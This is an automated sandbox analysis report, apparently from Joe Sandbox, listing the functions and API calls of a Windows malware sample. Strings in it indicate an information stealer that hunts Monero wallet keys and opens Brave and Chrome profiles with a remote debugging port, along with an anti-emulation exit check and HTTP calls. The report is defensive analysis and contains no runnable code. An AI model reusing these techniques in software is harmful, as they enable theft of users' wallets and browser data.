                                        • Part of subcall function 00D362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
                                        • Part of subcall function 00D362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: fcc1b2b419e85911272436255df7ab2f60ed5ae3ab13f58868f26f9a55b2635e
                                      • Instruction ID: f3d1c667c41afdf9c4ae9d9276e1794678a31e93579987dca39d338653e5759f
                                      • Opcode Fuzzy Hash: fcc1b2b419e85911272436255df7ab2f60ed5ae3ab13f58868f26f9a55b2635e
                                      • Instruction Fuzzy Hash: 01111230940508ABDB14FFA8DD92AED7339EF50340F404658F91A5B492EF30AB08CB71
                                      Function 00D47A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00D47ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: 301b1980a050f14b4cfc8972d175eabe983fee93b5b3ae88a6f40349456d4e5d
                                      • Instruction ID: 4de7f6ef11ef7bd374a72a28c80522fb77e3968255856e0db64e9163c3e7628c
                                      • Opcode Fuzzy Hash: 301b1980a050f14b4cfc8972d175eabe983fee93b5b3ae88a6f40349456d4e5d
                                      • Instruction Fuzzy Hash: F20186B1A04349ABC710DF98D945BAEBBB8F704715F100119F585E2280D7795A0487B1
                                      Function 00D31110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                                      • ExitProcess.KERNEL32 ref: 00D31143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: be4852281d7c3003225915b2ac0cefc4d1de9f713e0301867c65f78a7b407102
                                      • Instruction ID: 0a93bf99dba82c7ca2d0c8bd6789fa367dbe1390d181f1bcc8d2d798486bc2f9
                                      • Opcode Fuzzy Hash: be4852281d7c3003225915b2ac0cefc4d1de9f713e0301867c65f78a7b407102
                                      • Instruction Fuzzy Hash: F9E0CD7094530CFBE7216B90DD0EB4C767CDB04B01F100054F748761C4C6BD35404769
                                      Function 00D310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D310B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D310F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 76986d453bfd94cb515f6be31f8823838071fbfa39244ba536bd6d9534c06ac4
                                      • Instruction ID: 3f001d9f633b99241858029cbfba2903538c45ce277a9dd0ac368220ef18f3f9
                                      • Opcode Fuzzy Hash: 76986d453bfd94cb515f6be31f8823838071fbfa39244ba536bd6d9534c06ac4
                                      • Instruction Fuzzy Hash: E1F082B5641218BBE7289AA8AC59FAEB7A8E705B45F300448F544E7280D576AF00DBB4
                                      Function 00D31190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47AA0
                                        • Part of subcall function 00D47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00D47AA7
                                        • Part of subcall function 00D47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00D47ABF
                                        • Part of subcall function 00D479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47A10
                                        • Part of subcall function 00D479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47A17
                                        • Part of subcall function 00D479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D47A2F
                                      • ExitProcess.KERNEL32 ref: 00D311C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: 671e1f7e396a739cefc6a2a7042f0f272e50be510b7ba14b7d1cfe75eab74b2e
                                      • Instruction ID: fb5ff727031fdba267a81cab18294a025478a49782c74295c9ac5851dd71107f
                                      • Opcode Fuzzy Hash: 671e1f7e396a739cefc6a2a7042f0f272e50be510b7ba14b7d1cfe75eab74b2e
                                      • Instruction Fuzzy Hash: E0E017B9904302A7DA20B3B4AC07B6F328CDB1474EF040828FA4882146EE2AF9108A75

                                      Non-executed Functions

                                      Function 00D3BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00D50B32,00D50B2F,00000000,?,?,?,00D51450,00D50B2E), ref: 00D3BEC5
                                      • StrCmpCA.SHLWAPI(?,00D51454), ref: 00D3BF33
                                      • StrCmpCA.SHLWAPI(?,00D51458), ref: 00D3BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00D3C8BB
                                      Strings
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00D3C3B2
                                      • Brave, xrefs: 00D3C0E8
                                      • Google Chrome, xrefs: 00D3C6F8
                                      • Preferences, xrefs: 00D3C104
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00D3C495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00D3C534
                                      • \Brave\Preferences, xrefs: 00D3C1C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: e7dbe7100b4d8d9a6b2c5fbf5b41711ebbbeffcd5a73dbfe7edee0bffa59a7bb
                                      • Instruction ID: 17629494534076c2418b52221f9dae2f55026ca28a9e90244a025af9542c90aa
                                      • Opcode Fuzzy Hash: e7dbe7100b4d8d9a6b2c5fbf5b41711ebbbeffcd5a73dbfe7edee0bffa59a7bb
                                      • Instruction Fuzzy Hash: 30524F729501189BDB24FB64DD96EEE733DEF54300F404599B94AA6081EF34AB48CFB2
                                      Function 00D43B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00D43B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D43B33
                                      • lstrcat.KERNEL32(?,?), ref: 00D43B85
                                      • StrCmpCA.SHLWAPI(?,00D50F58), ref: 00D43B97
                                      • StrCmpCA.SHLWAPI(?,00D50F5C), ref: 00D43BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D43EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00D43ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: e2513db76d5726cbf94d87779bb9d67a422a6925f8b1975b57b99c887ac20758
                                      • Instruction ID: 1416467e49b6a894e9ecc181f900ddfada9cc385001be8ed1ad779e152ab6e23
                                      • Opcode Fuzzy Hash: e2513db76d5726cbf94d87779bb9d67a422a6925f8b1975b57b99c887ac20758
                                      • Instruction Fuzzy Hash: FAA13171A002089BDB35DFA8DC85FEA7379EB48301F044598BA4D96185DB75AB88CF71
                                      Function 00D44B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00D44B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D44B93
                                      • StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D44BC1
                                      • StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D44DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00D44DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 309b225b334b84952a96dad8a412300db0b2bd8fe9437ed0d94035dc5502ce1f
                                      • Instruction ID: 69599acd122c5ef9fbbba53a7b62d4f287651c1f1f84edd7409e4d42615aa990
                                      • Opcode Fuzzy Hash: 309b225b334b84952a96dad8a412300db0b2bd8fe9437ed0d94035dc5502ce1f
                                      • Instruction Fuzzy Hash: E8615872900118ABCB34EBA4DC45FEA777CEF48701F048588F64996144EB75AB88CFB1
                                      Function 00D447C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D447D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D447D7
                                      • wsprintfA.USER32 ref: 00D447F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D4480D
                                      • StrCmpCA.SHLWAPI(?,00D50FAC), ref: 00D4483B
                                      • StrCmpCA.SHLWAPI(?,00D50FB0), ref: 00D44851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D448DB
                                      • FindClose.KERNEL32(000000FF), ref: 00D448F0
                                      • lstrcat.KERNEL32(?,0167E888), ref: 00D44915
                                      • lstrcat.KERNEL32(?,0167D860), ref: 00D44928
                                      • lstrlen.KERNEL32(?), ref: 00D44935
                                      • lstrlen.KERNEL32(?), ref: 00D44946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 5228039fc7315a06e33c2990fb6e5ba36bf9a613362adb63803e411fa2e95ab7
                                      • Instruction ID: c102afafdde9e92a26a893aba0830237c9e5a5deaae7a625366ba4aa9446ec65
                                      • Opcode Fuzzy Hash: 5228039fc7315a06e33c2990fb6e5ba36bf9a613362adb63803e411fa2e95ab7
                                      • Instruction Fuzzy Hash: D85156715402189BCB25EB74DC89FED777CEB58300F404588B68996184DB79EB88CFB1
                                      Function 00D440F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00D44113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D4412A
                                      • StrCmpCA.SHLWAPI(?,00D50F94), ref: 00D44158
                                      • StrCmpCA.SHLWAPI(?,00D50F98), ref: 00D4416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D442BC
                                      • FindClose.KERNEL32(000000FF), ref: 00D442D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
